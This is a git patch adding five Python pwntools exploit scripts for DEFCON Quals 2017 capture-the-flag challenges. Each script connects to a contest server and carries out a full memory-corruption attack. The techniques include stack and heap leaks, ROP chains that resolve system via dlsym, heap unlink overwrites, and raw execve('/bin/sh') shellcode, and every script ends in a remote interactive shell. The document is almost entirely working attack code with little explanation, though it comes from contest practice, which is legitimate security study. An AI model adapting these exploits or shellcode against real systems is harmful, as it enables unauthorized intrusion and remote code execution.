From 03b2d3288e2f5827d02716c43e79284189022238 Mon Sep 17 00:00:00 2001 From: Nick Gregory Date: Mon, 1 May 2017 01:58:10 -0400 Subject: [PATCH] Add pwnables from DEFCON Quals 2017 --- DEFCON_Quals_2017/badint.py | 62 ++++++++++++++++++++++++++++ DEFCON_Quals_2017/beat.py | 78 +++++++++++++++++++++++++++++++++++ DEFCON_Quals_2017/emp.py | 82 +++++++++++++++++++++++++++++++++++++ DEFCON_Quals_2017/ropdo.py | 48 ++++++++++++++++++++++ DEFCON_Quals_2017/smash.py | 14 +++++++ 5 files changed, 284 insertions(+) create mode 100644 DEFCON_Quals_2017/badint.py create mode 100644 DEFCON_Quals_2017/beat.py create mode 100644 DEFCON_Quals_2017/emp.py create mode 100644 DEFCON_Quals_2017/ropdo.py create mode 100644 DEFCON_Quals_2017/smash.py diff --git a/DEFCON_Quals_2017/badint.py b/DEFCON_Quals_2017/badint.py new file mode 100644 index 0000000..86870ed --- /dev/null +++ b/DEFCON_Quals_2017/badint.py @@ -0,0 +1,62 @@ +from pwn import * + +context.log_level = "DEBUG" + +#p = process('./badint') +p = remote('badint_7312a689cf32f397727635e8be495322.quals.shallweplayaga.me', 21813) + +p.recv() + +# stack leak +p.sendline('0') +p.recv() +p.sendline('0') +p.recv() +p.sendline('A'*512) +p.recvuntil(']') +stack = u64(p.recv(16).decode('hex')[::-1]) +print "stack:", hex(stack) +p.recvuntil('SEQ #') + + +# pivot rsp to a lot of stack data we control +p.sendline('0') # seq +p.recv() +p.sendline(str(256-0x20)) # offset +p.recv() + +saved_bp = stack-32 +our_buf = stack+144+0x1d8-0x48 +pop_5x = 0x000000000040252d + +print "saved bp:", hex(saved_bp) +print "our buf:", hex(our_buf) + +pop_rdi = 0x0000000000402533 +pop_rsi_r15 = 0x0000000000402531 +call_rax = 0x0000000000400ccd +dlsym = 0x400B90 +# overwrite + # v-- dest - 0x8 # val +thing = p64(saved_bp - 8).encode('hex') + p64(our_buf).encode('hex') +thing += p64(0x604000).encode('hex') # ptr_to_n_elems +thing += '1' * (472-0x30-len(thing)) + +ptr_to_system = our_buf + 8*10 +ptr_to_bin_sh = ptr_to_system + len("system\x00") +thing += p64(pop_rdi) + p64(0) +thing += p64(pop_rsi_r15) + p64(ptr_to_system) + p64(0) +thing += p64(dlsym) +thing += p64(pop_rdi) + p64(ptr_to_bin_sh) +thing += p64(call_rax) + +thing += "system\x00" +thing += "/bin/sh\x00" + +print len(thing) + +p.sendline(thing) +p.recv() +p.sendline('Yes') # Last seg + +p.interactive() diff --git a/DEFCON_Quals_2017/beat.py b/DEFCON_Quals_2017/beat.py new file mode 100644 index 0000000..223ca16 --- /dev/null +++ b/DEFCON_Quals_2017/beat.py @@ -0,0 +1,78 @@ +from pwn import * + +context.log_level = "DEBUG" + +#p = process('./beatmeonthedl') +p = remote('beatmeonthedl_498e7cad3320af23962c78c7ebe47e16.quals.shallweplayaga.me', 6969) +pause() + +p.recvuntil('username: ') +p.sendline('A'*16) +p.recvuntil('user: ') +p.recvuntil('A'*16) +l = p.recvuntil('\n')[:-1] +l += '\x00' * (8-len(l)) +stack_leak = u64(l) +print hex(stack_leak) + +p.sendline('mcfly') +p.recvuntil('Pass: ') +p.sendline('awesnap') + +p.recvuntil('| ') + +def request(data): + p.sendline('1') + p.recvuntil('> ') + p.sendline(data) + p.recvuntil('| ') + +def delete(idx): + p.sendline('3') + p.recvuntil('choice: ') + p.sendline(str(idx)) + p.recvuntil('| ') + +def change(idx, data): + p.sendline('4') + p.recvuntil('choice: ') + p.sendline(str(idx)) + p.recvuntil('data: ') + p.sendline(data) + p.recvuntil('| ') + + +request('A'*0x38) +request('B'*0x38) +request('C'*0x38) +request('D'*0x38) +request('E'*0x38) + +delete(3) + +change(2, 'F'*0x38 + p64(0x609ab8)*3) + +request('G'*4) + +delete(2) + +change(1, 'H'*0x38 + p64(0x609ac0)*3) + +main_ret_addr = stack_leak + 40 + +request(p64(main_ret_addr-0x18)) + + +request('a'*24) + +change(0, p64(0x609b88-0x18)) + +request('1'*4) + +delete(1) + +change(0, 'A'*0x3b + "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05") + +p.sendline('5') + +p.interactive() diff --git a/DEFCON_Quals_2017/emp.py b/DEFCON_Quals_2017/emp.py new file mode 100644 index 0000000..eaa435a --- /dev/null +++ b/DEFCON_Quals_2017/emp.py @@ -0,0 +1,82 @@ +from pwn import * + +context.log_level = "DEBUG" + +#p = process('./empanada') +p = remote('empanada_45e50f0410494ec9cfb90430d2e86287.quals.shallweplayaga.me', 47281) + + +def msg(t, size, idx): + return chr(t << 7 | idx << 5 | size) + +def msg_cnt(idx=0, t=1): + return msg(t,1,idx) + chr(64) + +def del_msg(msg_idx, idx=0, t=1): + return msg(t,2,idx) + chr(80) + chr(msg_idx) + +def get_all(idx=0, t=1): + return msg(t,1,idx) + chr(96) + +def get_msg(msg_idx, idx=0, t=1): + return msg(t,2,idx) + chr(48) + chr(msg_idx) + +def get_hash(msg_idx, idx=0, t=1): + return msg(t,2,idx) + chr(32) + chr(msg_idx) + +def store_msg(idx=1, t=1): + return msg(t,1,idx) + chr(16) + +def del_all(idx=0, t=1): + return msg(t,1,idx) + chr(0) + +def exit(idx=0, t=1): + return msg(t,1,idx) + chr(1) + +def clr_invalid(idx=0, t=1): + return msg(t,1,idx) + chr(0xfe) + +def data_msg(data, idx=0, t=1): + return msg(t, len(data), idx) + data + +# setup what will become our own empmsg +shellcode_addr = 0x313371ef + +p.sendline(store_msg() + data_msg('A'*9 + p32(shellcode_addr) + 'A'*3)) +print p.recv() +p.sendline(store_msg() + data_msg(' ' + p32(0x31337138) + 'B'*7)) +print p.recv() + +# The two data messages with t=0 will get rellocated to get_all's msg itself +# and then to get_all's response buffer +p.sendline(store_msg() + data_msg('', t=0)) +print p.recv() +p.sendline(store_msg() + data_msg('', t=0)) +print p.recv() + +p.sendline(clr_invalid()) +print p.recv() + +p.sendline(get_all()) +print p.recv() + +# read in to another shellcode buffer at 0x31338000 so we don't have to worry +# about length and jump to it +shellcode = "\xb8\x03\x00\x00\x00\xbb\x00\x00\x00\x00\xb9\x00\x8031\xba\xe8\x03\x00\x00\xcd\x80\xb8\x00\x8031\xff\xe0" + +p.sendline(store_msg() + data_msg(shellcode)) +print p.recv() + +# at this point, the last store should have a dangling next pointer. +# now try to get the hash which walks the linked list, hopefully calling +# something we control from the original messages + +p.sendline(get_hash(3)) + +# 2nd stage shellcode which opens "flag", reads, and writes to stdout +p.sendline("\xb8\x05\x00\x00\x00j\x00hflag\x89\xe3\xb9\x00\x00\x00\x00\xcd\x80\x89\xc3\xb8\x03\x00\x00\x00\xb9\x00\x9031\xbad\x00\x00\x00\xcd\x80\xb8\x04\x00\x00\x00\xbb\x01\x00\x00\x00\xb9\x00\x9031\xbad\x00\x00\x00\xcd\x80") + +p.sendline('ls') +print p.recv() + +p.interactive() diff --git a/DEFCON_Quals_2017/ropdo.py b/DEFCON_Quals_2017/ropdo.py new file mode 100644 index 0000000..bce9adc --- /dev/null +++ b/DEFCON_Quals_2017/ropdo.py @@ -0,0 +1,48 @@ +from pwn import * + +context.log_level = "DEBUG" + +p = remote('peropdo_bb53b90b35dba86353af36d3c6862621.quals.shallweplayaga.me', 80) +#p = process('./peropdo') +pause() + +seed = 0x048ab95a +name_addr = 0x80ecfed +pad = name_addr - 0x80ecfc4 +xor_eax = 0x08054b80 +inc_eax = 0x0807bf06 +pop_eax = 0x080e77a4 +pop_ebx = 0x08058e28 +pop_ecx = 0x080e5ee1 +pop_edx = 0x0806f2fa +interrupt = 0x08049551 + +s = p32(seed) +for x in range(pad+4): + s += ("A") +s += p32(pop_ebx) + p32(0x80ed051) # -> /bin/sh +s += p32(pop_edx) + p32(0x80ed05c) # envp +s += p32(pop_eax) + p32(0x80ed040) # argv - 0x24 +s += p32(pop_ecx) + p32(0x80ed051) # -> /bin/sh +s += p32(0x08054322) # mov [eax + 0x24], ecx; ret +s += p32(pop_ecx) + p32(0x80ed064) # argv -> [*/bin/sh, 0] + +s += p32(xor_eax) +for x in range(11): + s += p32(inc_eax) + +s += p32(interrupt) +s += "/bin/sh" + +assert '\x09' not in s +assert '\x0a' not in s +assert '\x0b' not in s +assert '\x00' not in s + +p.recv() +p.sendline(s) +p.recvuntil('?\n') +p.sendline("23") +p.recv() +p.sendline("n") +p.interactive() diff --git a/DEFCON_Quals_2017/smash.py b/DEFCON_Quals_2017/smash.py new file mode 100644 index 0000000..c513059 --- /dev/null +++ b/DEFCON_Quals_2017/smash.py @@ -0,0 +1,14 @@ +from pwn import * + +#p = process('./smashme') +p = remote('smashme_omgbabysfirst.quals.shallweplayaga.me', 57348) + +pause() + +magic = "Smash me outside, how bout dAAAAAAAAAAA" +push_rsp_ret = 0x000000000044611d +shellcode = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" + +p.sendline(magic+'B'*33+p64(push_rsp_ret)+shellcode) + +p.interactive()